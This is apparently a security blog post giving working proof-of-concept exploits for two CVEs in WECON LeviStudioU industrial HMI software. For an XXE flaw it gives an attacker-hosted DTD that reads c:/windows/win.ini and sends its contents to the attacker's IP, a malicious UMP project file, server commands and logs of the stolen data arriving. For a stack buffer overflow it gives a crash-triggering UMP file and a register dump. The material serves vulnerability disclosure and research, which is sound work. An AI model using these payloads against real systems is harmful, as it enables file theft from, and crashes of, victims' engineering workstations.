This blog presents the proof of concepts for two CVEs found in LeviStudioU Release Build 2019-09-21 exploiting XXE and Denial of Service.
1.1 XXE
This vulnerability allows remote attackers to disclose sensitive information on affected installations of WECON LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the processing of UMP files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of Administrator.
1.2 On Attacker’s machine
Save the following to “payload.dtd” and replace <192.168.136.143> with Attacker’s IP address
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://192.168.136.143/?x=%file;'>">
%eval;
%exfiltrate;
Start a python server on Attacker’s machine to serve the payload.dtd
python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
1.3 On Victim’s machine
The victim has to import the “poc.ump” file into LeviStudioU (Projects -> Open Project -> open poc.ump). This will throw an error, but the file content should be sent already to the attacker.
poc.ump file content:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hack [
<!ELEMENT x ANY >
<!ENTITY % alpha SYSTEM "http://192.168.136.143/payload.dtd">
%alpha;
%bravo;
]>
<x>&charlie;</x>
<note>
<to>Alice</to>
<from>Bob</from>
<header>Sync Meeting</header>
<time>1200</time>
<body>Meeting time changed</body>
</note>
1.4 On Attacker’s machine
We should see 2 request, one for DTD and one witht the contents of the file in the “x” parameter
python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.136.149 - - [03/Nov/2020 06:20:12] "GET /payload.dtd HTTP/1.1" 200 -
192.168.136.149 - - [03/Nov/2020 06:20:12] "GET /?x=;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
2.1 DoS
The vulnerability exists due to a boundary error when parsing the TrendSet tag within UMP files. A remote unauthenticated attacker trick the victim to open a specially crafted UMP file, trigger stack-based buffer overflow and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
2.2 Crash PoC
<?xml version="1.0" encoding="UTF-8"?>
<project filever="1.0" ProjectVer="2.0">
<PlcSet Count="1" Language="0">
<Connection>
<PLC Type="WECON SIMUTOCOL" Driver="simutocol.dll" HmiStatNo="0" PlcStatNo="0"/>
<CommSet Port="COM1" ComType="0" BaudRate="9600" StopBit="1" DataLength="8" CheckBit="NONE" WaitTimeout="10" RevTimeout="10" RetryTimes="2" RetryTimeOut="3" ComIoDelayTime="0" ComStepInterval="0"/></Connection></PlcSet>
<HmiSet Type="LEVI 2070" Width="800" Height="480" HmiTypeIndex="30" Language="0" StartScrNo="0" Style="Windows Classic"/>
<AddressLib/><StringLib Language="0"/><AlarmSet>
<Alarm bitaddr="HDX0.0" Trigger="1" bSave="1" bPrint="0" Fast="0" UseBuzzer="0" StrIndex="bbbb" TextColor="0x0" ScreenNo="-1" bSaveUnChain="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/>
<Alarm bitaddr="HDX0.0" Trigger="1" bSave="1" bPrint="0" Fast="0" UseBuzzer="0" StrIndex="fff" TextColor="0x0" ScreenNo="-1" bSaveUnChain="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/></AlarmSet>
<TrendSet>
<Trend IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/>
<Trend IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/></TrendSet>
<XYSet WordAddr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<XY IsContinue="1" WordAddr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/>
<XY IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" stCount="1"/></XYSet>
<DiscSet>
<Disc IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" CircleTime="1" stCount="1"/>
<Disc IsContinue="1" WordAddr="HDW0" Count="100" Timer="1" Trigger="0" IsTrigClr="0" DataFormat="2" DigitCount="4 0" CircleTime="1" stCount="1"/></DiscSet>
<EventSet/>
<SysSet>
<SecSet/>
<NETSet NETIPaddr="192.168.1.2" NETMASKaddr="255.255.255.0" NETWayaddr="192.168.1.1"/>
<BaseSet StorePattern="1" Background="-1" AlarmScrSave="0" JianGe="0" OsLanguage="1" IsScrIdVar="0" BgOnOffBitAddr="" ScrIdWordAddr="HDW0" CurScrIdAddr="" SysLen="0" IsScrFast="0" IsuseTTS="0" IsUseAuthority="0" IsUseOptLogFunc="0" IsUseSNMP="0" IsUDKeyboard="0" IsNShowPOPUP="0" IsEncrypt="0" nWallId="1" FloatHiLowReverse="0" HMINAME="" ProtectScreen="0" ProtectScreenTime="0" ProtectScreenNo="0" IsShowNC="0" IsHighWord="0" IsEnterTime="0" IsPowerEnterTime="0" EnterTime="" PowerEnterTime="" bAlCache="0" CacheValue="0" UseHideOperability="0" Operability="0"/></SysSet>
<ScreenSet>
<ScreenInfo ScrnNo="0" Child="0" ScrnName="Screen" Height="480" Width="800" Filled="1" BkColor="0xd8e9ec" FnColor="0xd8e9ec" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="0.hsc" Opened="1"/>
<ScreenInfo ScrnNo="1000" Child="1" ScrnName="BuilNum" Height="360" Width="600" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1000.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1001" Child="1" ScrnName="BuilKey" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1001.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1002" Child="0" ScrnName="Common Window" Height="480" Width="800" Filled="1" BkColor="0xffffff" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1002.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1003" Child="1" ScrnName="Fast Selection" Height="460" Width="100" Filled="1" BkColor="0xffffff" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1003.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1004" Child="1" ScrnName="UserPwdKb" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1004.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1006" Child="1" ScrnName="UserTimeKb" Height="380" Width="250" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1006.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1007" Child="1" ScrnName="UserTrdKb" Height="250" Width="400" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1007.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1008" Child="1" ScrnName="UserDataPwdKb" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1008.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1009" Child="1" ScrnName="Installpaymentset" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1009.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1010" Child="1" ScrnName="InstallpaymentPwd" Height="300" Width="700" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1010.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1011" Child="1" ScrnName="UserLogin" Height="244" Width="394" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1011.hsc" Opened="0"/>
<ScreenInfo ScrnNo="1012" Child="1" ScrnName="UserChangePSW" Height="264" Width="394" Filled="1" BkColor="0xcccccc" FnColor="0xffffff" Pattern="0" BmpIndex="-1" RightClass="0" ScrnFile="1012.hsc" Opened="0"/></ScreenSet><WordAlarmSet>
<Alarm Name="Word alarm 0Word alarm 0Word alarm 0" WordAddr="HDW0" HWordAddr="" LWordAddr="" HLimit="100" LLimit="100" EqualAlarmValue="" DataFormat="2" UseBuzzer="0" DigitCount="4 0" AlType="0" bSave="1" bPrint="0" Fast="0" NotSaveBeforeAlarmRemove="0" IsVar="0" StrIndex="" ScreenNo="-1" bSaveUnChain="0" IsInRangeAlarm="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/>
<Alarm Name="Word alarm 1Word alarm 1Word alarm 1" WordAddr="HDW0" HWordAddr="" LWordAddr="" HLimit="100" LLimit="100" EqualAlarmValue="" DataFormat="2" UseBuzzer="0" DigitCount="4 0" AlType="0" bSave="1" bPrint="0" Fast="0" NotSaveBeforeAlarmRemove="0" IsVar="0" StrIndex="" ScreenNo="-1" bSaveUnChain="0" IsInRangeAlarm="0" UseAlarmUpload="0" WordAddr9="" PopAlWndOnce="0" DelayTime="1000" PointPos="0 0" PopupScreenType="0" bIsDestoryWind="0" notice="0" bResetTrigger="0" UseAlarmUpload2="0" WordAddr10="" UploadHMIName="0" UploadTime="0" UploadAddr="0" UploadVale="0" UploadText="0" TextHappenColor="0x000000" TextClearColor="0x000000"/></WordAlarmSet>
<MultiLink>
<Extra bitaddr="HDX0.0" WordAddr="" DataLen="1"/>
<Extra bitaddr="HDX0.0" WordAddr="" DataLen="1"/></MultiLink>
<DataLogSet>
<Group FileName="Group0Group0Group0Group0Group0Group0Group0Group0" Timer="6" Interval="60" Trigger="0" TriggAddr="" BinaryMode="0" ErrorUseZero="0">
<Data Name="Channel0Channel0Channel0Channel0Channel0Channel0Channel0Channel0" WordAddr="HDW0" DataFormat="2" Len="0" DigitCount="4 0"/></Group>
<Group FileName="Group1Group1Group1Group1Group1Group1Group1Group1" Timer="6" Interval="60" Trigger="0" TriggAddr="" BinaryMode="0" ErrorUseZero="0">
<Data Name="Channel0Channel0Channel0Channel0Channel0Channel0Channel0Channel0" WordAddr="HDW0" DataFormat="2" Len="0" DigitCount="4 0"/></Group></DataLogSet>
</project>
2.3 Registers dump
EAX 00000000
ECX 775BF8C8 ASCII "
STATUS_STACK_BUFFER_OVERRUN encountered
"
EDX 0000002B
EBX 00000001
ESP 0018CFB8
EBP 0018D034
ESI 00000000
EDI 00000000
EIP 775BF56B KERNELBA.775BF56B
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7FFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Want to know more about similar topics? I’m available for freelance projects and mentorship classes on Mentorcruise:
TRIPLA CONSULT 